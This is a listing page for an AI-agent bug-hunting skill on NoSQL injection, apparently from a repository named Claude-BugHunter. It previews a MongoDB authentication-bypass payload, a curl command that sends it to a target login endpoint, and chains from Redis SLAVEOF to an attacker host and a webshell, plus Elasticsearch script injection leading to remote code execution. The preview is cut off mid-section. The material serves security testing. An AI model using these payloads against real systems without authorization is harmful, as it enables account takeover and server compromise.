hunt-nosqli

Solid

Hunt NoSQL Injection — MongoDB operator injection ($where, $regex, $gt, $ne), CouchDB, Redis command injection, auth bypass via NoSQLi, data dump. Use when target uses MongoDB/Mongoose, CouchDB, Redis, or shows NoSQL error messages.

API & Backend | 1,912 stars | 279 forks | Updated 3 days ago | License: NOASSERTION

Quality Score: 86/100

- Stars 20%: 100
- Recency 20%: 100
- Frontmatter 20%: 70
- Documentation 15%: 100
- Issue Health 10%: 50
- License 10%: 100
- Description 5%: 100

Skill Content

# HUNT-NOSQLI — NoSQL Injection

## Crown Jewel Targets

NoSQL injection is most valuable when it bypasses authentication (Critical) or leaks the entire user collection (High).

**Highest-value chains:**

- **MongoDB auth bypass** — `{"username": {"$gt": ""}, "password": {"$gt": ""}}` logs in as first user in collection (usually admin)
- **$where JS injection** — if $where is enabled: blind injection → data exfil
- **Redis command injection** — via SSRF or direct TCP, SLAVEOF attacker-ip → config write → webshell
- **Elasticsearch injection** — _search endpoint with Groovy script injection (pre-5.0) → RCE

---

## Attack Surface Signals

### URL & Param Patterns

```
/api/users/login   POST with JSON body
/api/search?q=
/api/find?filter=
/api/query?where=
Any endpoint accepting JSON body with username/password
```

### Stack Signals

| Signal | Vector |
|--------|--------|
| MongoDB error messages in response | Operator injection |
| mongoose / monk in JS bundles | ODM patterns |
| X-Powered-By: Express | Node.js + MongoDB common stack |
| CouchDB/_utils UI exposed | Futon/Fauxton admin |
| Redis port 6379 open (via SSRF) | CONFIG SET / SLAVEOF |
| Elasticsearch :9200 open | Script injection |

---

## Step-by-Step Hunting Methodology

### Phase 1 — Auth Bypass (MongoDB)

```bash
# Operator injection in JSON body
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'

# Regex wildcard — m...
```

Details

- Author: elementalsouls
- Repository: elementalsouls/Claude-BugHunter
- Created: 1 month ago
- Last Updated: 3 days ago
- Language: Python
- License: NOASSERTION
